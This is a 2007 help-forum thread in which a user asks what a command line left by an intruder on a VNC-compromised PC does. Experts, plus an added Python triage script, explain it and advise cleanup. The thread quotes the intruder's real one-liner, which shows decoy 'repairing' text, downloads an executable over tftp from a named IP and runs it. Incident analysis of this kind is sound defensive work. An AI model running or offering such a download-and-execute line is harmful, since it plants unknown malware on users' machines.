Solved

What is this cmdline attempting to do?

Posted on 2007-11-27
Last Modified: 2013-11-16
Hi,

We recently had a PC hacked via RealVNC. The hacker executed the following command line:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&

Can anyone explain what this has done?

Regards

Rob
Question by: ertnev74
Accepted Solution by RQuadling (LVL 40, earned 350 total points)
ID: 20357105
%comspec%

This is telling the computer to run the command shell as identified by %COMSPEC%.

At the DOS prompt type SET and press Enter and you will see COMSPEC.
Normally cmd.exe or (older Windows) command.com.

/c

Tells the comspec to run a command and then quit.

echo Repairing user32.dll

Output to the screen.

&
echo Please wait...

Output to the screen.

&
tftp -i 81.88.110.178 GET cffhvvct.exe

Use the program tftp to get a file called cffhvvct.exe from the IP address 81.88.110.178.

&
start cffhvvct

Run the program just downloaded.

If you don't know the name of the program or the FTP site, don't run it.

I've just tried downloading the file from that site but it timed out.

If it was a virus, then the site may have been blocked or something else.
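Added example, not part of the question or of any answer in this thread: a small Python triage script that does mechanically what the accepted answer does by hand. It strips the %comspec% /c wrapper, splits the cmd.exe chain on '&', recognises the tftp GET stage and the start stage, and reports the indicators an administrator would want for a firewall block and a disk search (the remote host and the dropped file name). The sample input is the exact command line quoted in the question; the function names and the "decoy" label for the echo stages are my own.

```python
"""Triage helper for a cmd.exe download-and-execute one-liner (added example)."""
import re

# Constructed sample: the command line quoted in the question above.
SAMPLE = ("%comspec% /c echo Repairing user32.dll & echo Please wait... & "
          "tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&")


def split_chain(cmdline):
    """Split a cmd.exe chain into its stages.

    A leading '%comspec% /c' (or 'cmd /c') only means "run the rest in a
    fresh shell and quit", so it is removed. Stages are separated by '&',
    '&&' or '||'; the trailing '&' in the sample yields an empty stage,
    which is dropped.
    """
    line = cmdline.strip()
    wrapper = re.match(r"^(%comspec%|cmd(\.exe)?)\s+/c\s+", line, re.IGNORECASE)
    if wrapper:
        line = line[wrapper.end():]
    return [s for s in re.split(r"\s*(?:&&|\|\||&)\s*", line) if s]


def analyse(cmdline):
    """Classify each stage: screen output (decoy), remote fetch, or launch."""
    findings = {"stages": [], "decoys": [], "downloads": [], "launches": []}
    for stage in split_chain(cmdline):
        toks = stage.split()
        verb = toks[0].lower()
        findings["stages"].append(stage)
        if verb == "echo":
            # Text shown to the user while the real work happens.
            findings["decoys"].append(" ".join(toks[1:]))
        elif verb in ("tftp", "tftp.exe"):
            # tftp [-i] host {GET|PUT} source [destination]
            args = [t for t in toks[1:] if not t.startswith("-")]
            if len(args) >= 3 and args[1].upper() == "GET":
                local_name = args[3] if len(args) > 3 else args[2]
                findings["downloads"].append(
                    {"host": args[0], "file": local_name, "binary": "-i" in toks})
        elif verb in ("start", "start.exe"):
            # start ["title"] [/switches] program ... ; take the program token.
            for t in toks[1:]:
                if t.startswith("/") or t.startswith('"'):
                    continue
                findings["launches"].append(t)
                break
    return findings


def download_then_execute(findings):
    """Pair each fetched file with a later launch of the same name (any extension)."""
    pairs = []
    for d in findings["downloads"]:
        stem = d["file"].rsplit(".", 1)[0].lower()
        for launched in findings["launches"]:
            if launched.rsplit(".", 1)[0].lower() == stem:
                pairs.append((d["host"], d["file"], launched))
    return pairs


def indicators(findings):
    """Hosts to block at the firewall and file names to search the disk for."""
    return {"block_hosts": sorted({d["host"] for d in findings["downloads"]}),
            "hunt_files": sorted({d["file"] for d in findings["downloads"]})}


if __name__ == "__main__":
    result = analyse(SAMPLE)
    for stage in result["stages"]:
        print("stage:", stage)
    for host, fname, launched in download_then_execute(result):
        print(f"download-and-execute: {fname} fetched from {host}, then '{launched}' started")
    print("indicators:", indicators(result))
```

Run it as-is to see the four stages and the single download-and-execute pairing; to triage another line, pass it to analyse() instead of SAMPLE. The pairing logic is what matters for prioritising: an echo on its own is harmless, a tftp GET on its own is suspicious, but a fetch followed by a start of the same name is the pattern the accepted answer describes and should be treated as an executed unknown binary.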
Assisted Solution by kamleshgwalani (LVL 6, earned 100 total points)
ID: 20357113
Dear ertnev74,

A few weeks ago I got the same issue via VNC; it basically tries to dump 1.exe or 2.exe, which is a trojan. Basically, search the computer for the virus and try to find 1.exe.

You can manually end the process, rename it and later delete it.

Run good antivirus software like Windows Live OneCare or Ewido.

Read some more info:
http://en.wikipedia.org/wiki/ComSpec
http://www.liutilities.com/products/wintaskspro/processlibrary/1/
Assisted Solution by RQuadling (LVL 40, earned 350 total points)
ID: 20357123
OK. Having read the question again.

Without having access to the program itself, absolutely ANYTHING could have happened.

I would STRONGLY recommend disconnecting the PC from the LAN and running virus scanners and rootkit scanners.

Sysinternals Process Explorer (to see what is currently running and make sure YOU know it should be running).
Sysinternals RootkitRevealer (to see if any rootkits exist).
Sysinternals Autoruns (to see what is launched when the computer is turned on or when you log in).
HijackThis is a similar program to Autoruns, but produces a report which others can look at (http://www.spywareinfo.com/~merijn/programs.php).
Assisted Solution by rpggamergirl (LVL 47, earned 50 total points)
ID: 20357538
You could also try running some free scanners.

SUPERAntiSpyware:
http://www.superantispyware.com/

Download and install Dr.Web CureIt:
http://www.freedrweb.com/

AVG Anti-Spyware:
http://free.grisoft.com/doc/download-free-anti-spyware/us/frt/0

Or, run ComboFix and upload the log for us to check.
Download ComboFix to your Desktop, from either of these locations:
http://www.techsupportforum.com/sectools/sUBs/ComboFix.exe
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Double click "combofix.exe" and follow the prompts.
When finished, it shall produce a log for you.
Please upload the log at EE-Stuff.com for us to check.
Assisted Solution by kamleshgwalani (LVL 6, earned 100 total points)
ID: 20357582
Sorry, forgot to mention: always make sure that your firewall is turned on.
Or VNC should only be enabled as and when required.
If you can change the default port, i.e. 5900, to some other port, that would be helpful too, as this port is well known to hackers, so they just scan the port and get in.
I did this same thing with our guys and it solved my problem.

Now, since the program has been executed on your machine, better do a virus/spyware/trojan scan and then do the needful as above.
Expert Comment by kamleshgwalani (LVL 6)
ID: 20357691
So what's the problem? Were you able to find 1.exe?
Author Comment by ertnev74
ID: 20358036
All, thanks for your assistance with this query.

The user saw some activity on his screen last Thursday around midday. I advised him to shut off his router. When I got to his PC he explained what he had seen. Clicking on Start > Run I found the above cmdline.

I looked up 'VNC being hacked' on EE and found a few solutions to rectify the situation. Once I made the box secure by running Spyware / AV / Process Scanners, I then looked at the cause and possible damage.
The cmdline was the only thing I didn't understand... but I do now :)

The AV scan removed a few trojans and viruses so I'm not too sure if 1.exe was on the box; however, I was able to trace the IP of the hacker back to America.

Thanks again.
Expert Comment by kamleshgwalani (LVL 6)
ID: 20359640
Thanks for the valuable feedback. The best is to keep your Windows Firewall ON and keep Windows patched!